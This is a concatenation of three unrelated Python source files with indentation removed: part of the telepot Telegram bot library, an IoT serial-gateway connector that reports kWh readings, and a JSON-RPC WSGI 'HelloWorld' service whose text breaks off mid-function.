""" See: https://core.telegram.org/bots/api#pinchatmessage """
p = _strip(locals())
return self._api_request('pinChatMessage', _rectify(p))
def unpinChatMessage(self, chat_id):
""" See: https://core.telegram.org/bots/api#unpinchatmessage """
p = _strip(locals())
return self._api_request('unpinChatMessage', _rectify(p))
def leaveChat(self, chat_id):
""" See: https://core.telegram.org/bots/api#leavechat """
p = _strip(locals())
return self._api_request('leaveChat', _rectify(p))
def getChat(self, chat_id):
""" See: https://core.telegram.org/bots/api#getchat """
p = _strip(locals())
return self._api_request('getChat', _rectify(p))
def getChatAdministrators(self, chat_id):
""" See: https://core.telegram.org/bots/api#getchatadministrators """
p = _strip(locals())
return self._api_request('getChatAdministrators', _rectify(p))
def getChatMembersCount(self, chat_id):
""" See: https://core.telegram.org/bots/api#getchatmemberscount """
p = _strip(locals())
return self._api_request('getChatMembersCount', _rectify(p))
def getChatMember(self, chat_id, user_id):
""" See: https://core.telegram.org/bots/api#getchatmember """
p = _strip(locals())
return self._api_request('getChatMember', _rectify(p))
def setChatStickerSet(self, chat_id, sticker_set_name):
""" See: https://core.telegram.org/bots/api#setchatstickerset """
p = _strip(locals())
return self._api_request('setChatStickerSet', _rectify(p))
def deleteChatStickerSet(self, chat_id):
""" See: https://core.telegram.org/bots/api#deletechatstickerset """
p = _strip(locals())
return self._api_request('deleteChatStickerSet', _rectify(p))
def answerCallbackQuery(self, callback_query_id,
text=None,
show_alert=None,
url=None,
cache_time=None):
""" See: https://core.telegram.org/bots/api#answercallbackquery """
p = _strip(locals())
return self._api_request('answerCallbackQuery', _rectify(p))
def answerShippingQuery(self, shipping_query_id, ok,
shipping_options=None,
error_message=None):
""" See: https://core.telegram.org/bots/api#answershippingquery """
p = _strip(locals())
return self._api_request('answerShippingQuery', _rectify(p))
def answerPreCheckoutQuery(self, pre_checkout_query_id, ok,
error_message=None):
""" See: https://core.telegram.org/bots/api#answerprecheckoutquery """
p = _strip(locals())
return self._api_request('answerPreCheckoutQuery', _rectify(p))
def editMessageText(self, msg_identifier, text,
parse_mode=None,
disable_web_page_preview=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagetext
:param msg_identifier:
a 2-tuple (``chat_id``, ``message_id``),
a 1-tuple (``inline_message_id``),
or simply ``inline_message_id``.
You may extract this value easily with :meth:`telepot.message_identifier`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageText', _rectify(p))
def editMessageCaption(self, msg_identifier,
caption=None,
parse_mode=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagecaption
:param msg_identifier: Same as ``msg_identifier`` in :meth:`telepot.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageCaption', _rectify(p))
def editMessageReplyMarkup(self, msg_identifier,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagereplymarkup
:param msg_identifier: Same as ``msg_identifier`` in :meth:`telepot.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageReplyMarkup', _rectify(p))
def deleteMessage(self, msg_identifier):
"""
See: https://core.telegram.org/bots/api#deletemessage
:param msg_identifier:
Same as ``msg_identifier`` in :meth:`telepot.Bot.editMessageText`,
except this method does not work on inline messages.
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('deleteMessage', _rectify(p))
def sendSticker(self, chat_id, sticker,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendsticker
:param sticker: Same as ``photo`` in :meth:`telepot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['sticker'])
return self._api_request_with_file('sendSticker', _rectify(p), 'sticker', sticker)
def getStickerSet(self, name):
"""
See: https://core.telegram.org/bots/api#getstickerset
"""
p = _strip(locals())
return self._api_request('getStickerSet', _rectify(p))
def uploadStickerFile(self, user_id, png_sticker):
"""
See: https://core.telegram.org/bots/api#uploadstickerfile
"""
p = _strip(locals(), more=['png_sticker'])
return self._api_request_with_file('uploadStickerFile', _rectify(p), 'png_sticker', png_sticker)
def createNewStickerSet(self, user_id, name, title, png_sticker, emojis,
contains_masks=None,
mask_position=None):
"""
See: https://core.telegram.org/bots/api#createnewstickerset
"""
p = _strip(locals(), more=['png_sticker'])
return self._api_request_with_file('createNewStickerSet', _rectify(p), 'png_sticker', png_sticker)
def addStickerToSet(self, user_id, name, png_sticker, emojis,
mask_position=None):
"""
See: https://core.telegram.org/bots/api#addstickertoset
"""
p = _strip(locals(), more=['png_sticker'])
return self._api_request_with_file('addStickerToSet', _rectify(p), 'png_sticker', png_sticker)
def setStickerPositionInSet(self, sticker, position):
"""
See: https://core.telegram.org/bots/api#setstickerpositioninset
"""
p = _strip(locals())
return self._api_request('setStickerPositionInSet', _rectify(p))
def deleteStickerFromSet(self, sticker):
"""
See: https://core.telegram.org/bots/api#deletestickerfromset
"""
p = _strip(locals())
return self._api_request('deleteStickerFromSet', _rectify(p))
def answerInlineQuery(self, inline_query_id, results,
cache_time=None,
is_personal=None,
next_offset=None,
switch_pm_text=None,
switch_pm_parameter=None):
""" See: https://core.telegram.org/bots/api#answerinlinequery """
p = _strip(locals())
return self._api_request('answerInlineQuery', _rectify(p))
def getUpdates(self,
offset=None,
limit=None,
timeout=None,
allowed_updates=None):
""" See: https://core.telegram.org/bots/api#getupdates """
p = _strip(locals())
return self._api_request('getUpdates', _rectify(p))
def setWebhook(self,
url=None,
certificate=None,
max_connections=None,
allowed_updates=None):
""" See: https://core.telegram.org/bots/api#setwebhook """
p = _strip(locals(), more=['certificate'])
if certificate:
files = {'certificate': certificate}
return self._api_request('setWebhook', _rectify(p), files)
else:
return self._api_request('setWebhook', _rectify(p))
def deleteWebhook(self):
""" See: https://core.telegram.org/bots/api#deletewebhook """
return self._api_request('deleteWebhook')
def getWebhookInfo(self):
""" See: https://core.telegram.org/bots/api#getwebhookinfo """
return self._api_request('getWebhookInfo')
def setGameScore(self, user_id, score, game_message_identifier,
force=None,
disable_edit_message=None):
"""
See: https://core.telegram.org/bots/api#setgamescore
:param game_message_identifier: Same as ``msg_identifier`` in :meth:`telepot.Bot.editMessageText`
"""
p = _strip(locals(), more=['game_message_identifier'])
p.update(_dismantle_message_identifier(game_message_identifier))
return self._api_request('setGameScore', _rectify(p))
def getGameHighScores(self, user_id, game_message_identifier):
"""
See: https://core.telegram.org/bots/api#getgamehighscores
:param game_message_identifier: Same as ``msg_identifier`` in :meth:`telepot.Bot.editMessageText`
"""
p = _strip(locals(), more=['game_message_identifier'])
p.update(_dismantle_message_identifier(game_message_identifier))
return self._api_request('getGameHighScores', _rectify(p))
def download_file(self, file_id, dest):
"""
Download a file to local disk.
:param dest: a path or a ``file`` object
"""
f = self.getFile(file_id)
try:
d = dest if _isfile(dest) else open(dest, 'wb')
r = api.download((self._token, f['file_path']), preload_content=False)
while 1:
data = r.read(self._file_chunk_size)
if not data:
break
d.write(data)
finally:
if not _isfile(dest) and 'd' in locals():
d.close()
if 'r' in locals():
r.release_conn()
def message_loop(self, callback=None, relax=0.1,
timeout=20, allowed_updates=None,
source=None, ordered=True, maxhold=3,
run_forever=False):
"""
:deprecated: will be removed in future. Use :class:`.MessageLoop` instead.
Spawn a thread to constantly ``getUpdates`` or pull updates from a queue.
Apply ``callback`` to every message received. Also starts the scheduler thread
for internal events.
:param callback:
a function that takes one argument (the message), or a routing table.
If ``None``, the bot's ``handle`` method is used.
A *routing table* is a dictionary of ``{flavor: function}``, mapping messages to appropriate
handler functions according to their flavors. It allows you to define functions specifically
to handle one flavor of messages. It usually looks like this: ``{'chat': fn1,
'callback_query': fn2, 'inline_query': fn3, ...}``. Each handler function should take
one argument (the message).
:param source:
Source of updates.
If ``None``, ``getUpdates`` is used to obtain new messages from Telegram servers.
If it is a synchronized queue (``Queue.Queue`` in Python 2.7 or
``queue.Queue`` in Python 3), new messages are pulled from the queue.
A web application implementing a webhook can dump updates into the queue,
while the bot pulls from it. This is how telepot can be integrated with webhooks.
Acceptable contents in queue:
- ``str``, ``unicode`` (Python 2.7), or ``bytes`` (Python 3, decoded using UTF-8)
representing a JSON-serialized `Update <https://core.telegram.org/bots/api#update>`_ object.
- a ``dict`` representing an Update object.
When ``source`` is ``None``, these parameters are meaningful:
:type relax: float
:param relax: seconds between each ``getUpdates``
:type timeout: int
:param timeout:
``timeout`` parameter supplied to :meth:`telepot.Bot.getUpdates`,
controlling how long to poll.
:type allowed_updates: array of string
:param allowed_updates:
``allowed_updates`` parameter supplied to :meth:`telepot.Bot.getUpdates`,
controlling which types of updates to receive.
When ``source`` is a queue, these parameters are meaningful:
:type ordered: bool
:param ordered:
If ``True``, ensure in-order delivery of messages to ``callback``
(i.e. updates with a smaller ``update_id`` always come before those with
a larger ``update_id``).
If ``False``, no re-ordering is done. ``callback`` is applied to messages
as soon as they are pulled from queue.
:type maxhold: float
:param maxhold:
Applied only when ``ordered`` is ``True``. The maximum number of seconds
an update is held waiting for a not-yet-arrived smaller ``update_id``.
When this number of seconds is up, the update is delivered to ``callback``
even if some smaller ``update_id``\s have not yet arrived. If those smaller
``update_id``\s arrive at some later time, they are discarded.
Finally, there is this parameter, meaningful always:
:type run_forever: bool or str
:param run_forever:
If ``True`` or any non-empty string, append an infinite loop at the end of
this method, so it never returns. Useful as the very last line in a program.
A non-empty string will also be printed, useful as an indication that the
program is listening.
"""
if callback is None:
callback = self.handle
elif isinstance(callback, dict):
callback = flavor_router(callback)
collect_queue = queue.Queue()
def collector():
while 1:
try:
item = collect_queue.get(block=True)
callback(item)
except:
# Localize error so thread can keep going.
traceback.print_exc()
def relay_to_collector(update):
key = _find_first_key(update, ['message',
'edited_message',
'channel_post',
'edited_channel_post',
'callback_query',
'inline_query',
'chosen_inline_result',
'shipping_query',
'pre_checkout_query'])
if key in update:
collect_queue.put(update[key])
else:
print("收到了没有处理的消息",update.keys())
return update['update_id']
def get_from_telegram_server():
offset = None # running offset
allowed_upd = allowed_updates
while 1:
try:
result = self.getUpdates(offset=offset,
timeout=timeout,
allowed_updates=allowed_upd)
# Once passed, this parameter is no longer needed.
allowed_upd = None
if len(result) > 0:
# No sort. Trust server to give messages in correct order.
# Update offset to max(update_id) + 1
offset = max([relay_to_collector(update) for update in result]) + 1
except exception.BadHTTPResponse as e:
traceback.print_exc()
# Servers probably down. Wait longer.
if e.status == 502:
time.sleep(30)
except:
traceback.print_exc()
finally:
time.sleep(relax)
def dictify3(data):
if type(data) is bytes:
return json.loads(data.decode('utf-8'))
elif type(data) is str:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
def dictify27(data):
if type(data) in [str, unicode]:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
def get_from_queue_unordered(qu):
dictify = dictify3 if sys.version_info >= (3,) else dictify27
while 1:
try:
data = qu.get(block=True)
update = dictify(data)
relay_to_collector(update)
except:
traceback.print_exc()
def get_from_queue(qu):
dictify = dictify3 if sys.version_info >= (3,) else dictify27
# Here is the re-ordering mechanism, ensuring in-order delivery of updates.
max_id = None # max update_id passed to callback
buffer = collections.deque() # keep those updates which skip some update_id
qwait = None # how long to wait for updates,
# because buffer's content has to be returned in time.
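            # Illustrative walk-through of the buffering below: with max_id == 7, if
            # updates 9 and 10 arrive before 8, buffer becomes
            # [<expiry for 8>, update_9, update_10]. Once update 8 arrives (or its
            # expiry passes), it is relayed and the buffered 9 and 10 follow at once.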
while 1:
try:
data = qu.get(block=True, timeout=qwait)
update = dictify(data)
if max_id is None:
# First message received, handle regardless.
max_id = relay_to_collector(update)
elif update['update_id'] == max_id + 1:
# No update_id skipped, handle naturally.
max_id = relay_to_collector(update)
                        # clear contiguous updates in buffer
if len(buffer) > 0:
buffer.popleft() # first element belongs to update just received, useless now.
while 1:
try:
if type(buffer[0]) is dict:
max_id = relay_to_collector(buffer.popleft()) # updates that arrived earlier, handle them.
else:
                                        break  # gap, no more contiguous updates
except IndexError:
break # buffer empty
elif update['update_id'] > max_id + 1:
                        # Update arrives prematurely, insert into buffer.
nbuf = len(buffer)
if update['update_id'] <= max_id + nbuf:
# buffer long enough, put update at position
buffer[update['update_id'] - max_id - 1] = update
else:
# buffer too short, lengthen it
expire = time.time() + maxhold
for a in range(nbuf, update['update_id']-max_id-1):
buffer.append(expire) # put expiry time in gaps
buffer.append(update)
else:
pass # discard
except queue.Empty:
# debug message
# print('Timeout')
# some buffer contents have to be handled
# flush buffer until a non-expired time is encountered
while 1:
try:
if type(buffer[0]) is dict:
max_id = relay_to_collector(buffer.popleft())
else:
expire = buffer[0]
if expire <= time.time():
max_id += 1
buffer.popleft()
else:
break # non-expired
except IndexError:
break # buffer empty
except:
traceback.print_exc()
finally:
try:
# don't wait longer than next expiry time
qwait = buffer[0] - time.time()
if qwait < 0:
qwait = 0
except IndexError:
# buffer empty, can wait forever
qwait = None
# debug message
# print ('Buffer:', str(buffer), ', To Wait:', qwait, ', Max ID:', max_id)
collector_thread = threading.Thread(target=collector)
collector_thread.daemon = True
collector_thread.start()
if source is None:
message_thread = threading.Thread(target=get_from_telegram_server)
elif isinstance(source, queue.Queue):
if ordered:
message_thread = threading.Thread(target=get_from_queue, args=(source,))
else:
message_thread = threading.Thread(target=get_from_queue_unordered, args=(source,))
else:
raise ValueError('Invalid source')
message_thread.daemon = True # need this for main thread to be killable by Ctrl-C
message_thread.start()
self._scheduler.on_event(collect_queue.put)
self._scheduler.run_as_thread()
if run_forever:
if _isstring(run_forever):
print(run_forever)
while 1:
time.sleep(10)
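# A minimal sketch (not part of telepot proper) of how message_loop() is typically
# driven; the token and handler bodies are placeholders and this function is never
# called by the module itself.
def _example_message_loop_usage(token):
    """Poll getUpdates with a flavor routing table, or pull webhook updates
    from a queue. Purely illustrative."""
    def on_chat(msg):
        print('chat message received')
    def on_callback_query(msg):
        print('callback query received')
    bot = Bot(token)
    # 1. Poll getUpdates and route each update to a handler by flavor
    #    (blocks here because of run_forever):
    bot.message_loop({'chat': on_chat, 'callback_query': on_callback_query},
                     run_forever='Listening ...')
    # 2. Alternatively, a webhook endpoint can dump raw Update objects (JSON strings
    #    or dicts) into a queue and the bot pulls from it, re-ordering by update_id:
    #        update_queue = queue.Queue()
    #        bot.message_loop(on_chat, source=update_queue, ordered=True)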
import inspect
class SpeakerBot(Bot):
def __init__(self, token):
super(SpeakerBot, self).__init__(token)
self._mic = helper.Microphone()
@property
def mic(self):
return self._mic
def create_listener(self):
q = queue.Queue()
self._mic.add(q)
ln = helper.Listener(self._mic, q)
return ln
class DelegatorBot(SpeakerBot):
def __init__(self, token, delegation_patterns):
"""
:param delegation_patterns: a list of (seeder, delegator) tuples.
"""
super(DelegatorBot, self).__init__(token)
self._delegate_records = [p+({},) for p in delegation_patterns]
def _startable(self, delegate):
return ((hasattr(delegate, 'start') and inspect.ismethod(delegate.start)) and
(hasattr(delegate, 'is_alive') and inspect.ismethod(delegate.is_alive)))
def _tuple_is_valid(self, t):
return len(t) == 3 and callable(t[0]) and type(t[1]) in [list, tuple] and type(t[2]) is dict
def _ensure_startable(self, delegate):
if self._startable(delegate):
return delegate
elif callable(delegate):
return threading.Thread(target=delegate)
elif type(delegate) is tuple and self._tuple_is_valid(delegate):
func, args, kwargs = delegate
return threading.Thread(target=func, args=args, kwargs=kwargs)
else:
raise RuntimeError('Delegate does not have the required methods, is not callable, and is not a valid tuple.')
def handle(self, msg):
self._mic.send(msg)
for calculate_seed, make_delegate, dict in self._delegate_records:
id = calculate_seed(msg)
if id is None:
continue
elif isinstance(id, collections.Hashable):
if id not in dict or not dict[id].is_alive():
d = make_delegate((self, msg, id))
d = self._ensure_startable(d)
dict[id] = d
dict[id].start()
else:
d = make_delegate((self, msg, id))
d = self._ensure_startable(d)
d.start()
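# Illustrative sketch (not from the telepot docs): delegation_patterns is a list of
# (seeder, delegator) pairs. The seeder maps a message to a hashable seed (or None to
# skip the pattern); the delegator receives the tuple (bot, msg, seed) and returns
# something startable -- a Thread-like object, a plain callable, or a
# (func, args, kwargs) tuple. The names below are placeholders.
#
#     def seed_by_chat(msg):                            # seeder
#         return msg.get('chat', {}).get('id')          # None -> pattern skipped
#
#     def spawn_worker(seed_tuple):                     # delegator
#         bot, msg, seed = seed_tuple
#         return (handle_conversation, (bot, msg), {})  # hypothetical worker function
#
#     bot = DelegatorBot('YOUR_TOKEN', [(seed_by_chat, spawn_worker)])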
|
client.py
|
"""
Copyright 2018 InfAI (CC SES)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
try:
from connector_lib.client import Client
from connector_lib.modules.device_pool import DevicePool
from serial_gateway.manager import SerialManager
from serial_gateway.logger import root_logger
from web_ui.ws_console import WebsocketConsole
from web_ui.app import WebUI
except ImportError as ex:
exit("{} - {}".format(__name__, ex.msg))
from threading import Thread
import asyncio, time, json, datetime
logger = root_logger.getChild(__name__)
def pushReadings():
while True:
for controller in SerialManager.getControllers():
try:
Client.event(
controller._extended_id,
'detection',
json.dumps({
'value': float(controller._kwh),
'unit': 'kWh',
'time': '{}Z'.format(datetime.datetime.utcnow().isoformat())
}),
block=False
)
time.sleep(0.1)
except Exception as ex:
logger.error(ex)
time.sleep(20)
readings_scraper = Thread(target=pushReadings, name="Scraper")
loop = asyncio.get_event_loop()
cw = asyncio.get_child_watcher()
if __name__ == '__main__':
connector_client = Client(device_manager=DevicePool)
WebsocketConsole(loop)
WebUI()
SerialManager()
readings_scraper.start()
loop.run_forever()
|
HelloWorldServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'HelloWorld'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from HelloWorld.HelloWorldImpl import HelloWorld # noqa @IgnorePep8
impl_HelloWorld = HelloWorld(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
        This method is the same as call() except that the return value is a
        Python object instead of a JSON string. It is mainly useful for
        debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
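# Illustrative note (not part of the generated service): call()/call_py() expect an
# already-deserialized JSON-RPC request, e.g.
#     {'version': '1.1', 'method': 'HelloWorld.status', 'params': [], 'id': '1'}
# or a list of such dicts for a batch call. Requests without an 'id' are treated as
# notifications and produce no response.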
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'HelloWorld'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.rpc_service.add(impl_HelloWorld.status,
name='HelloWorld.status',
types=[dict])
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP server listening on
# port 9999 by default, execute this file directly
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
    By default, the server starts on localhost on a system-assigned port in the
    main thread. Execution of the main thread stays in the server main loop
    until interrupted. To run the server in a separate process (and thus allow
    the stop_server method to be called), set newprocess=True; the port number
    is then returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
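# Illustrative usage (not part of the generated server code): run the test server in
# a child process so it can be stopped programmatically.
#     port = start_server(port=0, newprocess=True)   # port=0 -> system-assigned port
#     # ... issue JSON-RPC POSTs against http://localhost:<port> ...
#     stop_server()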
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
